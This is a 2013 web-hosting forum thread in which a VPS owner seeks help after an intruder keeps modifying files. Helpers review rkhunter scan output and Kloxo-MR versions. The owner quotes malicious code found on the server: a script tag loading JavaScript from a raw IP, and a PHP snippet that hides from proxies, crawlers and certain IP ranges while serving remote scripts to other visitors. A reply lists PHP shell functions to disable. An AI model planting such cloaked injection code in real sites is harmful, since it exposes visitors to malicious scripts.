MRatWork Forum by Mustafa Ramadhan
General Discussions => GNU/Linux Helps => Topic started by: costa1988sv on 2013-02-24, 04:14:06
-
Someone is modifying files and mysql database on vps, the first time it modified files and stopped, after from mysql, and now again files, i changed the password, an switched to kloxo-mr, but and not fixed, he can don from my php script that?
[ Rootkit Hunter version 1.4.0 ]
[1;33mChecking rkhunter version... [0;39m
This version : 1.4.0
Latest version: 1.4.0
[ Rootkit Hunter version 1.4.0 ]
[1;33mChecking rkhunter data files... [0;39m
Checking file mirrors.dat [34C[ [1;32mNo update [0;39m ]
Checking file programs_bad.dat [29C[ [1;32mNo update [0;39m ]
Checking file backdoorports.dat [28C[ [1;32mNo update [0;39m ]
Checking file suspscan.dat [33C[ [1;32mNo update [0;39m ]
Checking file i18n/cn [38C[ [1;32mNo update [0;39m ]
Checking file i18n/de [38C[ [1;32mNo update [0;39m ]
Checking file i18n/en [38C[ [1;32mNo update [0;39m ]
Checking file i18n/zh [38C[ [1;32mNo update [0;39m ]
Checking file i18n/zh.utf8 [33C[ [1;32mNo update [0;39m ]
Warning: The command '/sbin/ifdown' has been replaced by a script: /sbin/ifdown: Bourne-Again shell script text executable
Warning: The command '/sbin/ifup' has been replaced by a script: /sbin/ifup: Bourne-Again shell script text executable
Warning: The command '/usr/bin/GET' has been replaced by a script: /usr/bin/GET: perl script text executable
Warning: The command '/usr/bin/groups' has been replaced by a script: /usr/bin/groups: Bourne shell script text executable
Warning: The command '/usr/bin/ldd' has been replaced by a script: /usr/bin/ldd: Bourne shell script text executable
Warning: The command '/usr/bin/whatis' has been replaced by a script: /usr/bin/whatis: Bourne shell script text executable
Warning: The file properties have changed:
File: /etc/rkhunter.conf
Current hash: 5a5dfd36c0278364949bdbd851ea9f4e086ac3bf
Stored hash : abd46c79e524e6f0e3b58756b3332761019edf80
Current size: 37361 Stored size: 37357
Current file modification time: 1361644930 (23-Feb-2013 21:42:10)
Stored file modification time : 1360752129 (13-Feb-2013 13:42:09)
Warning: Found enabled xinetd service: /etc/xinetd.d/pureftp
Warning: Found enabled xinetd service: /etc/xinetd.d/smtp_lxa
Warning: No output found from the lsmod command or the /proc/modules file:
/proc/modules output:
lsmod output:
Warning: The kernel modules directory '/lib/modules' is missing or empty.
Warning: The SSH and rkhunter configuration options should be the same:
SSH configuration option 'PermitRootLogin': yes
Rkhunter configuration option 'ALLOW_SSH_ROOT_USER': no
Warning: Suspicious file types found in /dev:
/dev/.udev/uevent_seqnum: ASCII text
Warning: Hidden directory found: '/dev/.udev'
Warning: Hidden file found: /usr/share/man/man1/..1.gz: gzip compressed data, from Unix, max compression
Warning: Hidden file found: /usr/bin/.fipscheck.hmac: ASCII text
Warning: Hidden file found: /usr/bin/.ssh.hmac: ASCII text
Warning: Hidden file found: /usr/sbin/.sshd.hmac: ASCII text
Warning: Application 'openssl', version '0.9.8e', is out of date, and possibly a security risk.
Warning: Application 'sshd', version '4.3p2', is out of date, and possibly a security risk.
-
You can attach files here with warning 'Bourne-Again shell script text executable' and 'perl script text executable'.
I want compare with my own systems.
Better update your Kloxo-MR and then inform here your system with run 'sh /script/sysfo'
-
sh /script/sysfo
sh: /script/sysfo: No such file or directory
-
You need update to Kloxo-MR latest version if didn't found '/script/sysinfo'.
-
Look like content of ifdown and other files as the same as in my servers.
It's as 'false positive'.
-
Yes, got the same. Just look for rootkits.
-
the rootkit scan is was clean
how i update?
Current Version: 6.5.0.c.2013021802
-
the rootkit scan is was clean
how i update?
Current Version: 6.5.0.c.2013021802
Read viewtopic.php?f=4&t=644 (http://forum.mratwork.com/viewtopic.php?f=4&t=644)
-
# /script/sysinfo
A. Kloxo-MR: 6.5.0.c.2013022402
B. OS: CentOS release 5.9 (Final) i686
C. Apps:
1. MySQL: mysql-5.0.96-1
2. PHP: php53u-5.3.21-1.ius.el5
3. Httpd: httpd-2.2.23-3.el5
4. Lighttpd: --uninstalled--
5. Nginx: nginx-1.3.13-1.el5
6. Qmail: qmail-1.03-1.5.15
D. Php-type (for Httpd/proxy): php-fpm_worker
E. Memory:
total used free shared buffers cached
Mem: 2048 805 1242 0 0 0
-/+ buffers/cache: 805 1242
Swap: 0 0 0
i installed new versioan and i get random 500 error an content encode error
-
switched to event an no more errors
-
in top i have 15+ /usr/libexec/courier-authlib/authdaemond processes
my script is 200% more faster , but wordpress is 25% slower
-
in top i have 15+ /usr/libexec/courier-authlib/authdaemond processes
my script is 200% more faster , but wordpress is 25% slower
It's not 'Security Problems'.
-
today, he modified a text file, what i use with include
he added at the end
<script type="text/javascript" src="http://5.175.183.98/js/linkbucks.php"></script>
-
and in php files
error_reporting(0);
$lang111 = $_SERVER['HTTP_ACCEPT_LANGUAGE'];
$useragent111 = $_SERVER['HTTP_USER_AGENT'];
$ip111 = $_SERVER['REMOTE_ADDR'];
$ip222 = substr($_SERVER['REMOTE_ADDR'], 0, 2);
if(strlen($_SERVER['HTTP_REFERER']))
{
$referer = parse_url($_SERVER['HTTP_REFERER']);
$referer['host'] = str_replace("www.", "", strtolower($referer['host']));
}
$iptarget = array("x103" , "x223" , "180", "110", "x39" , "114" , "118" , "222" , "125" ,
"202" , "203" , "66" , "74" , "182" , "111" , "219" , "27" , "116" ,
"119" , "61" ,"124", "141", "195", "64", "80", "82", "217", "89", "5", "31", "37", "46", "62", "77", "78", "79", "80", "81", "82", "83", "84", "85", "86",
"87", "88", "91", "92", "93", "94", "95", "109", "128", "134", "146", "149", "151",
"164", "171", "176", "178", "188", "193", "194", "195", "212", "213", "217");
$ugtarget = array("Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.19 (KHTML, like Gecko) Ubuntu/12.04 Chromium/18.0.1025.151 Chrome/18.0.1025.151 Safari/535.19","Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
"Mediapartners-Google" ,
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1");
$rfbad = array("3c21f107.linkbucks.com");
if ( $_SERVER['HTTP_X_FORWARDED_FOR']
|| $_SERVER['HTTP_X_FORWARDED']
|| $_SERVER['HTTP_FORWARDED_FOR']
|| $_SERVER['HTTP_CLIENT_IP']
|| $_SERVER['HTTP_FORWARDED']
|| $_SERVER['HTTP_VIA']
|| $_SERVER['HTTP_CLIENT_IP']
|| $_SERVER['HTTP_FORWARDED_FOR_IP']
|| $_SERVER['VIA']
|| $_SERVER['X_FORWARDED_FOR']
|| $_SERVER['FORWARDED_FOR']
|| $_SERVER['X_FORWARDED']
|| $_SERVER['FORWARDED']
|| $_SERVER['CLIENT_IP']
|| $_SERVER['FORWARDED_FOR_IP']
|| $_SERVER['CLIENT_IP']
|| $_SERVER['HTTP_PROXY_CONNECTION'])
{
echo "";
}
elseif (isset($_SERVER['HTTP_REFERER'])){
if (in_array($ip222, $iptarget)) {
echo "";
} elseif (in_array($useragent111, $ugtarget)){
echo "";
} elseif (!in_array($referer['host'], $rfbad)){
//echo "<script type="text/javascript" src="http://www.whackyvidz.com/Webservices/jsParseLinks.aspx?id=3c21f107"></script>";
//echo "<script src="http://yourjavascript.com/26202461412/my-overlay.js"></script>";
echo "<script type="text/javascript" src="http://yourjavascript.com/30131107225/h1.js"></script>";
}
}
-
Questions:
1. Install Kloxo-MR with fresh install or update from Kloxo Official?
2. Attack by hacker for all domains or just certain domain?
3. What app (wordpress and etcetera) for your domain where attacked?
-
So, you mean update from Kloxo to Kloxo-MR?.
If only 1 domains and if more then one domain but still one user that mean something wrong with app code.
-
i upgraded to kloxo-mr from kloxo
last night i updated kloxo-mr
the other domains are not too popular, how he can modify files from script? curl, fopen?
-
I will move your thread to 'GNU/Linux Helps' because this thread not related to Kloxo-MR but your php code.
Possible, he have 'backdoor' on your website and or your code not good.
Usually, just enough disable functions for 'exec,passthru,shell_exec,system,proc_open,popen,show_source' (default from Kloxo-MR).
-
I've disabled allow_url_fopen and allow_url_include
thank you for you help, i will install a fresh kloxo-mr when the backup will work